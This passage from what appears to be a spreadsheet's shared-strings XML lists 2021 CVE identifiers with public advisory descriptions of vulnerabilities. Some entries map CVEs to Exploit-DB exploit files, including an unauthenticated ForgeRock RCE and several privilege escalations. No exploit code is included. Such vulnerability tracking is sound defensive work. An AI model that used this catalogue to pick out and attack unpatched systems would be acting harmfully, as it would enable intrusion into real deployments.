    <t>A flaw was found in the Red Hat Ceph Storage RadosGW (Ceph Object Gateway) in versions before 14.2.21. The vulnerability is related to the injection of HTTP headers via a CORS ExposeHeader tag. The newline character in the ExposeHeader tag in the CORS configuration file generates a header injection in the response when the CORS request is made. In addition, the prior bug fix for CVE-2020-10753 did not account for the use of \r as a header separator, thus a new flaw has been created.</t>
  </si>
  <si>
    <t>CVE-2021-35240</t>
  </si>
  <si>
    <t>A security researcher stored XSS via a Help Server setting. This affects customers using Internet Explorer, because they do not support 'rel=noopener'.</t>
  </si>
  <si>
    <t>CVE-2021-35242</t>
  </si>
  <si>
    <t>Serv-U server responds with valid CSRFToken when the request contains only Session.</t>
  </si>
  <si>
    <t>CVE-2021-35243</t>
  </si>
  <si>
    <t>The HTTP PUT and DELETE methods were enabled in the Web Help Desk web server (12.7.7 and earlier), allowing users to execute dangerous HTTP requests. The HTTP PUT method is normally used to upload data that is saved on the server with a user-supplied URL. While the DELETE method requests that the origin server removes the association between the target resource and its current functionality. Improper use of these methods may lead to a loss of integrity.</t>
  </si>
  <si>
    <t>CVE-2021-35244</t>
  </si>
  <si>
    <t>The "Log alert to a file" action within action management enables any Orion Platform user with Orion alert management rights to write to any file. An attacker with Orion alert management rights could use this vulnerability to perform an unrestricted file upload causing a remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-35245</t>
  </si>
  <si>
    <t>When a user has admin rights in Serv-U Console, the user can move, create and delete any files are able to be accessed on the Serv-U host machine.</t>
  </si>
  <si>
    <t>CVE-2021-35247</t>
  </si>
  <si>
    <t>Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized. SolarWinds has updated the input mechanism to perform additional validation and sanitization. Please Note: No downstream affect has been detected as the LDAP servers ignored improper characters. To insure proper input validation is completed in all environments. SolarWinds recommends scheduling an update to the latest version of Serv-U.</t>
  </si>
  <si>
    <t>CVE-2021-35248</t>
  </si>
  <si>
    <t>It has been reported that any Orion user, e.g. guest accounts can query the Orion.UserSettings entity and enumerate users and their basic settings.</t>
  </si>
  <si>
    <t>CVE-2021-35249</t>
  </si>
  <si>
    <t>This broken access control vulnerability pertains specifically to a domain admin who can access configuration &amp; user data of other domains which they should not have access to. Please note the admin is unable to modify the data (read only operation). This UAC issue leads to a data leak to unauthorized users for a domain, with no log of them accessing the data unless they attempt to modify it. This read-only activity is logged to the original domain and does not specify which domain was accessed.</t>
  </si>
  <si>
    <t>CVE-2021-35250</t>
  </si>
  <si>
    <t>A researcher reported a Directory Transversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.</t>
  </si>
  <si>
    <t>CVE-2021-35251</t>
  </si>
  <si>
    <t>Sensitive information could be displayed when a detailed technical error message is posted. This information could disclose environmental details about the Web Help Desk installation.</t>
  </si>
  <si>
    <t>CVE-2021-35254</t>
  </si>
  <si>
    <t>SolarWinds received a report of a vulnerability related to an input that was not sanitized in WebHelpDesk. SolarWinds has removed this input field to prevent the misuse of this input in the future.</t>
  </si>
  <si>
    <t>CVE-2021-35265</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.</t>
  </si>
  <si>
    <t>CVE-2021-35266</t>
  </si>
  <si>
    <t>In NTFS-3G versions &lt; 2021.8.22, when a specially crafted NTFS inode pathname is supplied in an NTFS image a heap buffer overflow can occur resulting in memory disclosure, denial of service and even code execution.</t>
  </si>
  <si>
    <t>CVE-2021-35267</t>
  </si>
  <si>
    <t>NTFS-3G versions &lt; 2021.8.22, a stack buffer overflow can occur when correcting differences in the MFT and MFTMirror allowing for code execution or escalation of privileges when setuid-root.</t>
  </si>
  <si>
    <t>CVE-2021-35268</t>
  </si>
  <si>
    <t>In NTFS-3G versions &lt; 2021.8.22, when a specially crafted NTFS inode is loaded in the function ntfs_inode_real_open, a heap buffer overflow can occur allowing for code execution and escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2021-35269</t>
  </si>
  <si>
    <t>NTFS-3G versions &lt; 2021.8.22, when a specially crafted NTFS attribute from the MFT is setup in the function ntfs_attr_setup_flag, a heap buffer overflow can occur allowing for code execution and escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2021-3527</t>
  </si>
  <si>
    <t>A flaw was found in the USB redirector device (usb-redir) of QEMU. Small USB packets are combined into a single, large transfer request, to reduce the overhead and improve performance. The combined size of the bulk transfer is used to dynamically allocate a variable length array (VLA) on the stack without proper validation. Since the total size is not bounded, a malicious guest could use this flaw to influence the array length and cause the QEMU process to perform an excessive allocation on the stack, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-3528</t>
  </si>
  <si>
    <t>A flaw was found in noobaa-operator in versions before 5.7.0, where internal RPC AuthTokens between the noobaa operator and the noobaa core are leaked into log files. An attacker with access to the log files could use this AuthToken to gain additional access into noobaa deployment and can read/modify system configuration.</t>
  </si>
  <si>
    <t>CVE-2021-35283</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in product_admin.php in atoms183 CMS 1.0, allows attackers to execute arbitrary commands via the Name, Fname, and ID parameters to search.php.</t>
  </si>
  <si>
    <t>CVE-2021-3529</t>
  </si>
  <si>
    <t>A flaw was found in noobaa-core in versions before 5.7.0. This flaw results in the name of an arbitrarily URL being copied into an HTML document as plain text between tags, including potentially a payload script. The input was echoed unmodified in the application response, resulting in arbitrary JavaScript being injected into an application's response. The highest threat to the system is for confidentiality, availability, and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-35296</t>
  </si>
  <si>
    <t>An issue in the administrator authentication panel of PTCL HG150-Ub v3.0 allows attackers to bypass authentication via modification of the cookie value and Response Path.</t>
  </si>
  <si>
    <t>CVE-2021-35297</t>
  </si>
  <si>
    <t>Scalabium dBase Viewer version 2.6 (Build 5.751) is vulnerable to remote code execution via a crafted DBF file that triggers a buffer overflow. An attacker can use the Structured Exception Handler (SEH) records and redirect execution to attacker-controlled code.</t>
  </si>
  <si>
    <t>CVE-2021-35298</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Zammad 1.0.x up to 4.0.0 allows remote attackers to execute arbitrary web script or HTML via multiple models that contain a 'note' field to store additional information.</t>
  </si>
  <si>
    <t>CVE-2021-35299</t>
  </si>
  <si>
    <t>Incorrect Access Control in Zammad 1.0.x up to 4.0.0 allows attackers to obtain sensitive information via email connection configuration probing.</t>
  </si>
  <si>
    <t>CVE-2021-3530</t>
  </si>
  <si>
    <t>A flaw was discovered in GNU libiberty within demangle_path() in rust-demangle.c, as distributed in GNU Binutils version 2.36. A crafted symbol can cause stack memory to be exhausted leading to a crash.</t>
  </si>
  <si>
    <t>CVE-2021-35300</t>
  </si>
  <si>
    <t>Text injection/Content Spoofing in 404 page in Zammad 1.0.x up to 4.0.0 could allow remote attackers to manipulate users into visiting the attackers' page.</t>
  </si>
  <si>
    <t>CVE-2021-35301</t>
  </si>
  <si>
    <t>Incorrect Access Control in Zammad 1.0.x up to 4.0.0 allows remote attackers to obtain sensitive information via the Ticket Article detail view.</t>
  </si>
  <si>
    <t>CVE-2021-35302</t>
  </si>
  <si>
    <t>Incorrect Access Control for linked Tickets in Zammad 1.0.x up to 4.0.0 allows remote attackers to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-35303</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Zammad 1.0.x up to 4.0.0 allows remote attackers to execute arbitrary web script or HTML via the User Avatar attribute.</t>
  </si>
  <si>
    <t>CVE-2021-35306</t>
  </si>
  <si>
    <t>An issue was discovered in Bento4 through v1.6.0-636. A NULL pointer dereference exists in the function AP4_StszAtom::WriteFields located in Ap4StszAtom.cpp. It allows an attacker to cause a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2021-35307</t>
  </si>
  <si>
    <t>An issue was discovered in Bento4 through v1.6.0-636. A NULL pointer dereference exists in the AP4_DescriptorFinder::Test component located in /Core/Ap4Descriptor.h. It allows an attacker to cause a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2021-3531</t>
  </si>
  <si>
    <t>A flaw was found in the Red Hat Ceph Storage RGW in versions before 14.2.21. When processing a GET Request for a swift URL that ends with two slashes it can cause the rgw to crash, resulting in a denial of service. The greatest threat to the system is of availability.</t>
  </si>
  <si>
    <t>exploits/windows/local/50184.txt</t>
  </si>
  <si>
    <t>Amica Prodigy 1.7 - Privilege Escalation</t>
  </si>
  <si>
    <t>2021-08-10</t>
  </si>
  <si>
    <t>CVE-2021-35312</t>
  </si>
  <si>
    <t>A vulnerability was found in CIR 2000 / Gestionale Amica Prodigy v1.7. The Amica Prodigy's executable "RemoteBackup.Service.exe" has incorrect permissions, allowing a local unprivileged user to replace it with a malicious file that will be executed with "LocalSystem" privileges.</t>
  </si>
  <si>
    <t>CVE-2021-3532</t>
  </si>
  <si>
    <t>A flaw was found in Ansible where the secret information present in async_files are getting disclosed when the user changes the jobdir to a world readable directory. Any secret information in an async status file will be readable by a malicious user on that system. This flaw affects Ansible Tower 3.7 and Ansible Automation Platform 1.2.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50529.txt</t>
  </si>
  <si>
    <t>Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)</t>
  </si>
  <si>
    <t>2021-11-17</t>
  </si>
  <si>
    <t>CVE-2021-35323</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login.</t>
  </si>
  <si>
    <t>CVE-2021-35324</t>
  </si>
  <si>
    <t>A vulnerability in the Form_Login function of TOTOLINK A720R A720R_Firmware V4.1.5cu.470_B20200911 allows attackers to bypass authentication.</t>
  </si>
  <si>
    <t>CVE-2021-35325</t>
  </si>
  <si>
    <t>A stack overflow in the checkLoginUser function of TOTOLINK A720R A720R_Firmware v4.1.5cu.470_B20200911 allows attackers to cause a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2021-35326</t>
  </si>
  <si>
    <t>A vulnerability in TOTOLINK A720R router with firmware v4.1.5cu.470_B20200911 allows attackers to download the configuration file via sending a crafted HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-35327</t>
  </si>
  <si>
    <t>A vulnerability in TOTOLINK A720R A720R_Firmware v4.1.5cu.470_B20200911 allows attackers to start the Telnet service, then login with the default credentials via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-3533</t>
  </si>
  <si>
    <t>A flaw was found in Ansible if an ansible user sets ANSIBLE_ASYNC_DIR to a subdirectory of a world writable directory. When this occurs, there is a race condition on the managed machine. A malicious, non-privileged account on the remote machine can exploit the race condition to access the async result data. This flaw affects Ansible Tower 3.7 and Ansible Automation Platform 1.2.</t>
  </si>
  <si>
    <t>CVE-2021-35331</t>
  </si>
  <si>
    <t>** DISPUTED ** In Tcl 8.6.11, a format string vulnerability in nmakehlp.c might allow code execution via a crafted file. NOTE: multiple third parties dispute the significance of this finding.</t>
  </si>
  <si>
    <t>CVE-2021-35336</t>
  </si>
  <si>
    <t>Tieline IP Audio Gateway 2.6.4.8 and below is affected by Incorrect Access Control. A vulnerability in the Tieline Web Administrative Interface could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.</t>
  </si>
  <si>
    <t>CVE-2021-35337</t>
  </si>
  <si>
    <t>Sourcecodester Phone Shop Sales Managements System 1.0 is vulnerable to Insecure Direct Object Reference (IDOR). Any attacker will be able to see the invoices of different users by changing the id parameter.</t>
  </si>
  <si>
    <t>CVE-2021-35342</t>
  </si>
  <si>
    <t>The useradm service 1.14.0 (in Northern.tech Mender Enterprise 2.7.x before 2.7.1) and 1.13.0 (in Northern.tech Mender Enterprise 2.6.x before 2.6.1) allows users to access the system with their JWT token after logout, because of missing invalidation (if the JWT verification cache is enabled).</t>
  </si>
  <si>
    <t>CVE-2021-35343</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in the /op/op.Ajax.php in SeedDMS v5.1.x&lt;5.1.23 and v6.0.x&lt;6.0.16 allows a remote attacker to edit document name without victim's knowledge, by enticing an authenticated user to visit an attacker's web page.</t>
  </si>
  <si>
    <t>CVE-2021-35344</t>
  </si>
  <si>
    <t>tsMuxer v2.6.16 was discovered to contain a heap-based buffer overflow via the function BitStreamReader::getCurVal in bitStream.h.</t>
  </si>
  <si>
    <t>CVE-2021-35346</t>
  </si>
  <si>
    <t>tsMuxer v2.6.16 was discovered to contain a heap-based buffer overflow via the function HevcSpsUnit::short_term_ref_pic_set(int) in hevc.cpp.</t>
  </si>
  <si>
    <t>CVE-2021-3535</t>
  </si>
  <si>
    <t>Rapid7 Nexpose is vulnerable to a non-persistent cross-site scripting vulnerability affecting the Security Console's Filtered Asset Search feature. A specific search criterion and operator combination in Filtered Asset Search could have allowed a user to pass code through the provided search field. This issue affects version 6.6.80 and prior, and is fixed in 6.6.81. If your Security Console currently falls on or within this affected version range, ensure that you update your Security Console to the latest version.</t>
  </si>
  <si>
    <t>CVE-2021-35358</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in dotAdmin/#/c/c_Images of dotCMS 21.05.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' and 'Filename' parameters.</t>
  </si>
  <si>
    <t>CVE-2021-3536</t>
  </si>
  <si>
    <t>A flaw was found in Wildfly in versions before 23.0.2.Final while creating a new role in domain mode via the admin console, it is possible to add a payload in the name field, leading to XSS. This affects Confidentiality and Integrity.</t>
  </si>
  <si>
    <t>CVE-2021-35360</t>
  </si>
  <si>
    <t>A reflected cross site scripting (XSS) vulnerability in dotAdmin/#/c/containers of dotCMS 21.05.1 allows attackers to execute arbitrary commands or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2021-35361</t>
  </si>
  <si>
    <t>A reflected cross site scripting (XSS) vulnerability in dotAdmin/#/c/links of dotCMS 21.05.1 allows attackers to execute arbitrary commands or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2021-35368</t>
  </si>
  <si>
    <t>OWASP ModSecurity Core Rule Set 3.1.x before 3.1.2, 3.2.x before 3.2.1, and 3.3.x before 3.3.2 is affected by a Request Body Bypass via a trailing pathname.</t>
  </si>
  <si>
    <t>CVE-2021-3537</t>
  </si>
  <si>
    <t>A vulnerability found in libxml2 in versions before 2.9.11 shows that it did not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3538</t>
  </si>
  <si>
    <t>A flaw was found in github.com/satori/go.uuid in versions from commit 0ef6afb2f6cdd6cdaeee3885a95099c63f18fc8c to d91630c8510268e75203009fe7daf2b8e1d60c45. Due to insecure randomness in the g.rand.Read function the generated UUIDs are predictable for an attacker.</t>
  </si>
  <si>
    <t>exploits/windows/remote/50638.txt</t>
  </si>
  <si>
    <t>TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)</t>
  </si>
  <si>
    <t>CVE-2021-35380</t>
  </si>
  <si>
    <t>A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download (http://url:port/file?valore).</t>
  </si>
  <si>
    <t>CVE-2021-35387</t>
  </si>
  <si>
    <t>Hospital Management System v 4.0 is vulnerable to SQL Injection via file:hospital/hms/admin/view-patient.php.</t>
  </si>
  <si>
    <t>CVE-2021-35388</t>
  </si>
  <si>
    <t>Hospital Management System v 4.0 is vulnerable to Cross Site Scripting (XSS) via /hospital/hms/admin/patient-search.php.</t>
  </si>
  <si>
    <t>CVE-2021-3539</t>
  </si>
  <si>
    <t>EspoCRM 6.1.6 and prior suffers from a persistent (type II) cross-site scripting (XSS) vulnerability in processing user-supplied avatar images. This issue was fixed in version 6.1.7 of the product.</t>
  </si>
  <si>
    <t>CVE-2021-35392</t>
  </si>
  <si>
    <t>Realtek Jungle SDK version v2.x up to v3.4.14B provides a 'WiFi Simple Config' server that implements both UPnP and SSDP protocols. The binary is usually named wscd or mini_upnpd and is the successor to miniigd. The server is vulnerable to a heap buffer overflow that is present due to unsafe crafting of SSDP NOTIFY messages from received M-SEARCH messages ST header.</t>
  </si>
  <si>
    <t>CVE-2021-35393</t>
  </si>
  <si>
    <t>Realtek Jungle SDK version v2.x up to v3.4.14B provides a 'WiFi Simple Config' server that implements both UPnP and SSDP protocols. The binary is usually named wscd or mini_upnpd and is the successor to miniigd. The server is vulnerable to a stack buffer overflow vulnerability that is present due to unsafe parsing of the UPnP SUBSCRIBE/UNSUBSCRIBE Callback header. Successful exploitation of this vulnerability allows remote unauthenticated attackers to gain arbitrary code execution on the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-35394</t>
  </si>
  <si>
    <t>Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called 'MP Daemon' that is usually compiled as 'UDPServer' binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.</t>
  </si>
  <si>
    <t>CVE-2021-35395</t>
  </si>
  <si>
    <t>Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues: - stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter - stack buffer overflow in formWsc due to unsafe copy of submit-url parameter - stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter - stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter - stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter - stack buffer overflow in formWsc due to unsafe copy of 'peerPin' parameter - arbitrary command execution in formSysCmd via the sysCmd parameter - arbitrary command injection in formWsc via the 'peerPin' parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.</t>
  </si>
  <si>
    <t>CVE-2021-35397</t>
  </si>
  <si>
    <t>A path traversal vulnerability in the static router for Drogon from 1.0.0-beta14 to 1.6.0 could allow an unauthenticated, remote attacker to arbitrarily read files. The vulnerability is due to lack of proper input validation for requested path. An attacker could exploit this vulnerability by sending crafted HTTP request with specific path to read. Successful exploitation could allow the attacker to read files that should be restricted.</t>
  </si>
  <si>
    <t>CVE-2021-3540</t>
  </si>
  <si>
    <t>By abusing the 'install rpm info detail' command, an attacker can escape the restricted clish shell on affected versions of Ivanti MobileIron Core. This issue was fixed in version 11.1.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-3541</t>
  </si>
  <si>
    <t>A flaw was found in libxml2. Exponential entity expansion attack its possible bypassing all existing protection mechanisms and leading to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-35413</t>
  </si>
  <si>
    <t>A remote code execution (RCE) vulnerability in course_intro_pdf_import.php of Chamilo LMS v1.11.x allows authenticated attackers to execute arbitrary code via a crafted .htaccess file.</t>
  </si>
  <si>
    <t>CVE-2021-35414</t>
  </si>
  <si>
    <t>Chamilo LMS v1.11.x was discovered to contain a SQL injection via the doc parameter in main/plagiarism/compilatio/upload.php.</t>
  </si>
  <si>
    <t>CVE-2021-35415</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the course "Title" and "Content" fields.</t>
  </si>
  <si>
    <t>CVE-2021-3543</t>
  </si>
  <si>
    <t>A flaw null pointer dereference in the Nitro Enclaves kernel driver was found in the way that Enclaves VMs forces closures on the enclave file descriptor. A local user of a host machine could use this flaw to crash the system or escalate their privileges on the system.</t>
  </si>
  <si>
    <t>CVE-2021-35438</t>
  </si>
  <si>
    <t>phpIPAM 1.4.3 allows Reflected XSS via app/dashboard/widgets/ipcalc-result.php and app/tools/ip-calculator/result.php of the IP calculator.</t>
  </si>
  <si>
    <t>CVE-2021-3544</t>
  </si>
  <si>
    <t>Several memory leaks were found in the virtio vhost-user GPU device (vhost-user-gpu) of QEMU in versions up to and including 6.0. They exist in contrib/vhost-user-gpu/vhost-user-gpu.c and contrib/vhost-user-gpu/virgl.c due to improper release of memory (i.e., free) after effective lifetime.</t>
  </si>
  <si>
    <t>exploits/windows/local/50047.txt</t>
  </si>
  <si>
    <t>Remote Mouse GUI 3.008 - Local Privilege Escalation</t>
  </si>
  <si>
    <t>CVE-2021-35440</t>
  </si>
  <si>
    <t>Smashing 1.3.4 is vulnerable to Cross Site Scripting (XSS). A URL for a widget can be crafted and used to execute JavaScript on the victim's computer. The JavaScript code can then steal data available in the session/cookies depending on the user environment (e.g. if re-using internal URL's for deploying, or cookies that are very permissive) private information may be retrieved by the attacker.</t>
  </si>
  <si>
    <t>CVE-2021-35448</t>
  </si>
  <si>
    <t>Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections.</t>
  </si>
  <si>
    <t>CVE-2021-35449</t>
  </si>
  <si>
    <t>The Lexmark Universal Print Driver version 2.15.1.0 and below, G2 driver 2.7.1.0 and below, G3 driver 3.2.0.0 and below, and G4 driver 4.2.1.0 and below are affected by a privilege escalation vulnerability. A standard low priviliged user can use the driver to execute a DLL of their choosing during the add printer process, resulting in escalation of privileges to SYSTEM.</t>
  </si>
  <si>
    <t>CVE-2021-3545</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was found in the virtio vhost-user GPU device (vhost-user-gpu) of QEMU in versions up to and including 6.0. The flaw exists in virgl_cmd_get_capset_info() in contrib/vhost-user-gpu/virgl.c and could occur due to the read of uninitialized memory. A malicious guest could exploit this issue to leak memory from the host.</t>
  </si>
  <si>
    <t>CVE-2021-35450</t>
  </si>
  <si>
    <t>A Server Side Template Injection in the Entando Admin Console 6.3.9 and before allows a user with privileges to execute FreeMarker template with command execution via freemarker.template.utility.Execute</t>
  </si>
  <si>
    <t>CVE-2021-35451</t>
  </si>
  <si>
    <t>In Teradici PCoIP Management Console-Enterprise 20.07.0, an unauthenticated user can inject arbitrary text into user browser via the Web application.</t>
  </si>
  <si>
    <t>CVE-2021-35452</t>
  </si>
  <si>
    <t>An Incorrect Access Control vulnerability exists in libde265 v1.0.8 due to a SEGV in slice.cc.</t>
  </si>
  <si>
    <t>CVE-2021-35456</t>
  </si>
  <si>
    <t>Online Pet Shop We App 1.0 is vulnerable to remote SQL injection and shell upload</t>
  </si>
  <si>
    <t>CVE-2021-35458</t>
  </si>
  <si>
    <t>Online Pet Shop We App 1.0 is vulnerable to Union SQL Injection in products.php (aka p=products) via the c or s parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3546</t>
  </si>
  <si>
    <t>An out-of-bounds write vulnerability was found in the virtio vhost-user GPU device (vhost-user-gpu) of QEMU in versions up to and including 6.0. The flaw occurs while processing the 'VIRTIO_GPU_CMD_GET_CAPSET' command from the guest. It could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service condition, or potential code execution with the privileges of the QEMU process.</t>
  </si>
  <si>
    <t>exploits/java/webapps/50131.py</t>
  </si>
  <si>
    <t>ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)</t>
  </si>
  <si>
    <t>2021-07-16</t>
  </si>
  <si>
    <t>CVE-2021-35463</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Frontend Taglib module in Liferay Portal 7.4.0 allows remote attackers to inject arbitrary web script or HTML into the management toolbar search via the `keywords` parameter.</t>
  </si>
  <si>
    <t>CVE-2021-35464</t>
  </si>
  <si>
    <t>ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier</t>
  </si>
  <si>
    <t>CVE-2021-35465</t>
  </si>
  <si>
    <t>Certain Arm products before 2021-08-23 do not properly consider the effect of exceptions on a VLLDM instruction. A Non-secure handler may have read or write access to part of a Secure context. This affects Arm Cortex-M33 r0p0 through r1p0, Arm Cortex-M35P r0, Arm Cortex-M55 r0p0 through r1p0, and Arm China STAR-MC1 (in the STAR SE configuration).</t>
  </si>
  <si>
    <t>CVE-2021-35469</t>
  </si>
  <si>
    <t>The Lexmark Printer Software G2, G3 and G4 Installation Packages have a local escalation of privilege vulnerability due to a registry entry that has an unquoted service path.</t>
  </si>
  <si>
    <t>CVE-2021-3547</t>
  </si>
  <si>
    <t>OpenVPN 3 Core Library version 3.6 and 3.6.1 allows a man-in-the-middle attacker to bypass the certificate authentication by issuing an unrelated server certificate using the same hostname found in the verify-x509-name option in a client configuration.</t>
  </si>
  <si>
    <t>CVE-2021-35472</t>
  </si>
  <si>
    <t>An issue was discovered in LemonLDAP::NG before 2.0.12. Session cache corruption can lead to authorization bypass or spoofing. By running a loop that makes many authentication attempts, an attacker might alternately be authenticated as one of two different users.</t>
  </si>
  <si>
    <t>CVE-2021-35474</t>
  </si>
  <si>
    <t>Stack-based Buffer Overflow vulnerability in cachekey plugin of Apache Traffic Server. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-35475</t>
  </si>
  <si>
    <t>SAS Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.</t>
  </si>
  <si>
    <t>CVE-2021-35477</t>
  </si>
  <si>
    <t>In the Linux kernel through 5.13.7, an unprivileged BPF program can obtain sensitive information from kernel memory via a Speculative Store Bypass side-channel attack because a certain preempting store operation does not necessarily occur before a store operation that has an attacker-controlled value.</t>
  </si>
  <si>
    <t>CVE-2021-35478</t>
  </si>
  <si>
    <t>Nagios Log Server before 2.1.9 contains Reflected XSS in the dropdown box for the alert history and audit log function. All parameters used for filtering are affected. This affects users who open a crafted link or third-party web page.</t>
  </si>
  <si>
    <t>CVE-2021-35479</t>
  </si>
  <si>
    <t>Nagios Log Server before 2.1.9 contains Stored XSS in the custom column view for the alert history and audit log function through the affected pp parameter. This affects users who open a crafted link or third-party web page.</t>
  </si>
  <si>
    <t>CVE-2021-3548</t>
  </si>
  <si>
    <t>A flaw was found in dmg2img through 20170502. dmg2img did not validate the size of the read buffer during memcpy() inside the main() function. This possibly leads to memory layout information leaking in the data. This might be used in a chain of vulnerability in order to reach code execution.</t>
  </si>
  <si>
    <t>CVE-2021-35482</t>
  </si>
  <si>
    <t>An issue was discovered in Barco MirrorOp Windows Sender before 2.5.4.70. An attacker in the local network is able to achieve Remote Code Execution (with user privileges of the local user) on any device that tries to connect to a WePresent presentation system.</t>
  </si>
  <si>
    <t>CVE-2021-35487</t>
  </si>
  <si>
    <t>Nokia Broadcast Message Center through 11.1.0 allows an authenticated user to perform a Boolean Blind SQL Injection attack on the endpoint /owui/block/send-receive-updates (for the Manage Alerts page) via the extIdentifier HTTP POST parameter. This allows an attacker to obtain the database user, database name, and database version information, and potentially database data.</t>
  </si>
  <si>
    <t>CVE-2021-35488</t>
  </si>
  <si>
    <t>Thruk 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&amp;title={TITLE] Reflected XSS via the host or title parameter. An attacker could inject arbitrary JavaScript into status.cgi. The payload would be triggered every time an authenticated user browses the page containing it.</t>
  </si>
  <si>
    <t>CVE-2021-35489</t>
  </si>
  <si>
    <t>Thruk 2.40-2 allows /thruk/#cgi-bin/extinfo.cgi?type=2&amp;host={HOSTNAME]&amp;service={SERVICENAME]&amp;backend={BACKEND] Reflected XSS via the host or service parameter. An attacker could inject arbitrary JavaScript into extinfo.cgi. The malicious payload would be triggered every time an authenticated user browses the page containing it.</t>
  </si>
  <si>
    <t>CVE-2021-3549</t>
  </si>
  <si>
    <t>An out of bounds flaw was found in GNU binutils objdump utility version 2.36. An attacker could use this flaw and pass a large section to avr_elf32_load_records_from_section() probably resulting in a crash or in some cases memory corruption. The highest threat from this vulnerability is to integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-35490</t>
  </si>
  <si>
    <t>Thruk before 2.44 allows XSS for a quick command.</t>
  </si>
  <si>
    <t>CVE-2021-35491</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) vulnerability in Wowza Streaming Engine through 4.8.11+5 allows a remote attacker to delete a user account via the /enginemanager/server/user/delete.htm userName parameter. The application does not implement a CSRF token for the GET request. This issue was resolved in Wowza Streaming Engine release 4.8.14.</t>
  </si>
  <si>
    <t>CVE-2021-35492</t>
  </si>
  <si>
    <t>Wowza Streaming Engine through 4.8.11+5 could allow an authenticated, remote attacker to exhaust filesystem resources via the /enginemanager/server/vhost/historical.jsdata vhost parameter. This is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability through the Virtual Host Monitoring section by requesting random virtual-host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. (Manual intervention is required to free filesystem resources and return the application to an operational state.)</t>
  </si>
  <si>
    <t>CVE-2021-35493</t>
  </si>
  <si>
